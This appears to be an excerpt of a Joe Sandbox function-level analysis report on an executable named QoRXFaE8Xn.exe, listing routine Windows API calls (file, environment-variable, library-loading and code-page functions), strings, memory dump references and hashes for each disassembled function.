Opcode Fuzzy Hash: 48753cc3bc0bd39df5c1a33882bf563f6a2b25906aff8aeb1612bdd42501acce
Instruction Fuzzy Hash: 33F01D71955229BB8B30ABE1AC4CDEB7F6CEF052617404515F905D2210EA24D506D7B1

Function 008E76BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\QoRXFaE8Xn.exe,00000104), ref: 008E76FD
_free.LIBCMT ref: 008E77C8
_free.LIBCMT ref: 008E77D2

Strings

C:\Users\user\Desktop\QoRXFaE8Xn.exe, xrefs: 008E76F4, 008E76FB, 008E772A, 008E7762

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\QoRXFaE8Xn.exe
API String ID: 2506810119-211311882
Opcode ID: ec08cc0a4cf75be483703aa82ccd94f5665f4a4f6db74104616be8d8ffa3150b
Instruction ID: 4cb26ad46b0b7e018cd67092477873379b5125d8d9ef1dc27caf1ee3d802fabc
Opcode Fuzzy Hash: ec08cc0a4cf75be483703aa82ccd94f5665f4a4f6db74104616be8d8ffa3150b
Instruction Fuzzy Hash: 67318271A08298EFDB21EF9ADC81D9EBBFCFB96710B1440A6F904D7211D6708E41DB51

Function 008DD287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 008DD29D
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 008DD2D9

Strings

sfxcmd, xrefs: 008DD298
sfxpar, xrefs: 008DD2D4

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 3e7a0ff38a48b3db8eddbf0bb13b598f23280a954a8839ba808698b37e0f81c5
Instruction ID: 39a60bf7aa9f52e3afd175894d219809ea4b36e90c0c15c2924e49b592f1c6b3
Opcode Fuzzy Hash: 3e7a0ff38a48b3db8eddbf0bb13b598f23280a954a8839ba808698b37e0f81c5
Instruction Fuzzy Hash: 3AF0A77290062CA7D7202FA89C09FBA7769FF09751B000116FE44D6341DB74DD40D6F1

Function 008C984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 008C985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 008C9876
GetLastError.KERNEL32 ref: 008C98A8
GetLastError.KERNEL32 ref: 008C98C7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: a61e2d890c41d58d4f52ce10c8d8f13deac3f664f651e457a7a5c011aadc887f
Instruction ID: 221b7082f40cf7e209de184ad9a72b0dc863e6ee5a9497ac56c95624af04beca
Opcode Fuzzy Hash: a61e2d890c41d58d4f52ce10c8d8f13deac3f664f651e457a7a5c011aadc887f
Instruction Fuzzy Hash: AC115A31900608EBDB205A65C808F7977BCFB46731F10C5BEE8AAC7A90DB35DE409B52

Function 008EA4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008CCFE0,00000000,00000000,?,008EA49B,008CCFE0,00000000,00000000,00000000,?,008EA698,00000006,FlsSetValue), ref: 008EA526
GetLastError.KERNEL32(?,008EA49B,008CCFE0,00000000,00000000,00000000,?,008EA698,00000006,FlsSetValue,008F7348,008F7350,00000000,00000364,?,008E9077), ref: 008EA532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008EA49B,008CCFE0,00000000,00000000,00000000,?,008EA698,00000006,FlsSetValue,008F7348,008F7350,00000000), ref: 008EA540

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: a45785882b8217891ed09034c4b2dddbddf24da89473f6213aa9b3548d9c1026
Instruction ID: 95c28c7ff14f142f862498abf1fcb02738534e15c690855ee564c39ac7b55dfa
Opcode Fuzzy Hash: a45785882b8217891ed09034c4b2dddbddf24da89473f6213aa9b3548d9c1026
Instruction Fuzzy Hash: A301F732611666ABC7258BBA9C44E667B9CFF86FA17200621F906D3140D731F900CAE1

Function 008C9F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,008CCC94,00000001,?,?,?,00000000,008D4ECD,?,?,?), ref: 008C9F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,008D4ECD,?,?,?,?,?,008D4972,?), ref: 008C9F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,008CCC94,00000001,?,?), ref: 008C9FB8

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 7a1aecb52b452e5844c6e23232880fa353c68e06b0ab0a48e8a34e2271648b00
Instruction ID: 5c5bc670d49d2b3d9f9f6c4f7b9f91ec0423eb9870a121ee03e16636981c3aed
Opcode Fuzzy Hash: 7a1aecb52b452e5844c6e23232880fa353c68e06b0ab0a48e8a34e2271648b00
Instruction Fuzzy Hash: 9931E0712087099BDF248F24D848F6ABBB8FB90755F04469DF985DA281CB74D948CBA2

Function 008CA207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,008CA113,?,00000001,00000000,?,?), ref: 008CA22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,008CA113,?,00000001,00000000,?,?), ref: 008CA261
GetLastError.KERNEL32(?,?,?,?,008CA113,?,00000001,00000000,?,?), ref: 008CA27E

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 48b73c0dfbce2a983d21eed1d72bcdb6595e0db90920b593d590a7a3144dc27c
Instruction ID: b53d85ecc155394e7b15472826d9112fa6c20ecf1fe81fb2f0d2257fd14dc909
Opcode Fuzzy Hash: 48b73c0dfbce2a983d21eed1d72bcdb6595e0db90920b593d590a7a3144dc27c
Instruction Fuzzy Hash: 35016D2114162C66DB2AAA788C0AFE93379FB06749F08445AF801E6051DA76CA41C6A7

Function 008EAFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 008EB019

Strings

, xrefs: 008EB05E

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: ff8f125d7e95e831e65439e4c415ef46e5ba291cbaa79aa3f08ee2f6c8d77e5a
Instruction ID: 3fcea5700327e6a8b7aee70b81152fe795db5fabdfb905ef815203d6803aa48c
Opcode Fuzzy Hash: ff8f125d7e95e831e65439e4c415ef46e5ba291cbaa79aa3f08ee2f6c8d77e5a
Instruction Fuzzy Hash: 134106B05047CC9ADF228E69CC94AF7BBA9FB46318F1404EDE59AC7142D335AA45CF60

Function 008EA72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 008EA79D

Strings

LCMapStringEx, xrefs: 008EA73D, 008EA747

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 42d9170a89cc28290baec4a678e550da59a9c0f4bbf929abd84b0f5e1b341f8f
Instruction ID: 43ab549c198fd94397d58eb9ae9ef9a1e43368f48496f963fcb95f5cc6fbe2ae
Opcode Fuzzy Hash: 42d9170a89cc28290baec4a678e550da59a9c0f4bbf929abd84b0f5e1b341f8f
Instruction Fuzzy Hash: 1301483250420CBBCF06AFA5DC01DEE3F66FF08714F004114FE14A5260CA369A31EB92

Function 008EA6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,008E9D2F), ref: 008EA715

Strings

InitializeCriticalSectionEx, xrefs: 008EA6E5

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 6cc7782540549b1d9a35ba37baa386a5629ef76de719dce008199bab1fb951bc
Instruction ID: 4b6cc13f371de125caf6784c0985d159e6e79d80d7d55450b79d7754cf97535c
Opcode Fuzzy Hash: 6cc7782540549b1d9a35ba37baa386a5629ef76de719dce008199bab1fb951bc
Instruction Fuzzy Hash: B0F0BE3164520CBBCB05AF75DC05CBE7FA1FF15B20B404154FD199A360EA766A10EB91

Function 008EA56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 008EA5AE

Strings

FlsAlloc, xrefs: 008EA58A

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: e6ecf045983aac2769e891fe57fc8bce7c6004f3d57088c0c3fbdc4b70c8072e
Instruction ID: 85d905926b25fd0de43c655221051709dbb1dc8b1955982d47044bbe9f3484e6
Opcode Fuzzy Hash: e6ecf045983aac2769e891fe57fc8bce7c6004f3d57088c0c3fbdc4b70c8072e
Instruction Fuzzy Hash: 67E0203064522C6B92146BB59C02CBEBB50FB26B11B400119FD05DA340ED796A00D2D6

Function 008E329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 008E32AF

Strings

FlsAlloc, xrefs: 008E329E, 008E32A8

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: fcabc014ec6a38d315dd88af57b42703dc1344603f57270e7a40893ae6f550b2
Instruction ID: 6337e0cad1bece7eb90367eaae5c61500dbea23514fc1e053a5827c29850b57c
Opcode Fuzzy Hash: fcabc014ec6a38d315dd88af57b42703dc1344603f57270e7a40893ae6f550b2
Instruction Fuzzy Hash: 27D0C221781A786A811032A56C029BA7B04EB02BB3B450152FF28DA342A469494041C6

Function 008DE1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DE20B

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Strings

3Ro, xrefs: 008DE1F9, 008DE205

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Ro
API String ID: 1269201914-1492261280
Opcode ID: 9abe37cd9a732221740759c648743c6c05463f879e64233834f4d04cd04a4c67
Instruction ID: e0846bbfd68616aeca42c56cb35f7562da85c93622a4c743764d4cbbd4446f98
Opcode Fuzzy Hash: 9abe37cd9a732221740759c648743c6c05463f879e64233834f4d04cd04a4c67
Instruction Fuzzy Hash: 70B012912AE2057C321C2314FD06C36032CE4C0B50330821BB215E82809A404D094033

Function 008EB350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 008EAF1B: GetOEMCP.KERNEL32(00000000,?,?,008EB1A5,?), ref: 008EAF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,008EB1EA,?,00000000), ref: 008EB3C4
GetCPInfo.KERNEL32(00000000,008EB1EA,?,?,?,008EB1EA,?,00000000), ref: 008EB3D7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 36e0c3b3f6ab3a0244e0fb4cff5db0b37e9d026b5b2cb4b22d8d7b195076247c
Instruction ID: 852a7db91531ae1fae7c0945b1c3dc18ea62bc6911a61edfb386bec01d07e6bd
Opcode Fuzzy Hash: 36e0c3b3f6ab3a0244e0fb4cff5db0b37e9d026b5b2cb4b22d8d7b195076247c
Instruction Fuzzy Hash: E95128B09002999EDB249F77C881ABBBBE5FF42318F18406ED096CB293D735D541CB95

Function 008C1385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C1385

Part of subcall function 008C6057: __EH_prolog.LIBCMT ref: 008C605C

Part of subcall function 008CC827: __EH_prolog.LIBCMT ref: 008CC82C
Part of subcall function 008CC827: new.LIBCMT ref: 008CC86F
Part of subcall function 008CC827: new.LIBCMT ref: 008CC893

new.LIBCMT ref: 008C13FE

Part of subcall function 008CB07D: __EH_prolog.LIBCMT ref: 008CB082

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 94b8a560d49e01b80f2fa8be4fe07c72ca1d36e533e907dc2dd43ac0c280014f
Instruction ID: ea4e38badfeb2174988e26ead9e0554db0b8d52f8af49e391f2f1a4449ed8a7e
Opcode Fuzzy Hash: 94b8a560d49e01b80f2fa8be4fe07c72ca1d36e533e907dc2dd43ac0c280014f
Instruction Fuzzy Hash: 1C4126B0805B409ED724DF798485AE6FBE5FB19300F544A6ED2EEC3282DB326554CB16

Function 008C1380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C1385

Part of subcall function 008C6057: __EH_prolog.LIBCMT ref: 008C605C

Part of subcall function 008CC827: __EH_prolog.LIBCMT ref: 008CC82C
Part of subcall function 008CC827: new.LIBCMT ref: 008CC86F
Part of subcall function 008CC827: new.LIBCMT ref: 008CC893

new.LIBCMT ref: 008C13FE

Part of subcall function 008CB07D: __EH_prolog.LIBCMT ref: 008CB082

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e3b7d411cfe0e4ecb90daffc1b3e3fee105e04c4ae8e94e528b373be64ff60fb
Instruction ID: 74e7d680d1e39890828cbbba5f85c86b55c14476300912d72cb626ade7b6c9da
Opcode Fuzzy Hash: e3b7d411cfe0e4ecb90daffc1b3e3fee105e04c4ae8e94e528b373be64ff60fb
Instruction Fuzzy Hash: 9D4116B0805B409ED724DF798489AE7FBE5FB19300F544A6ED2EEC3282DB326554CB16

Function 008EB188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 008E8FA5: GetLastError.KERNEL32(?,00900EE8,008E3E14,00900EE8,?,?,008E3713,00000050,?,00900EE8,00000200), ref: 008E8FA9
Part of subcall function 008E8FA5: _free.LIBCMT ref: 008E8FDC
Part of subcall function 008E8FA5: SetLastError.KERNEL32(00000000,?,00900EE8,00000200), ref: 008E901D
Part of subcall function 008E8FA5: _abort.LIBCMT ref: 008E9023

Part of subcall function 008EB2AE: _abort.LIBCMT ref: 008EB2E0
Part of subcall function 008EB2AE: _free.LIBCMT ref: 008EB314

Part of subcall function 008EAF1B: GetOEMCP.KERNEL32(00000000,?,?,008EB1A5,?), ref: 008EAF46

_free.LIBCMT ref: 008EB200
_free.LIBCMT ref: 008EB236

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 220735c59b2d6698b5fd575c4a390e10fd835cd0b6ada31ac9c1e5a97d9a40b8
Instruction ID: 3d49cb69e6325dd62afd46a1ad3a1925164dd37df79bd00cb4b32523d6d4692a
Opcode Fuzzy Hash: 220735c59b2d6698b5fd575c4a390e10fd835cd0b6ada31ac9c1e5a97d9a40b8
Instruction Fuzzy Hash: C131D631904288EFDB10EFAED841B6E77E5FF42320F254099E518DB2A1DB719D41CB51

Function 008C971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,008C9EDC,?,?,008C7867), ref: 008C97A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,008C9EDC,?,?,008C7867), ref: 008C97DB

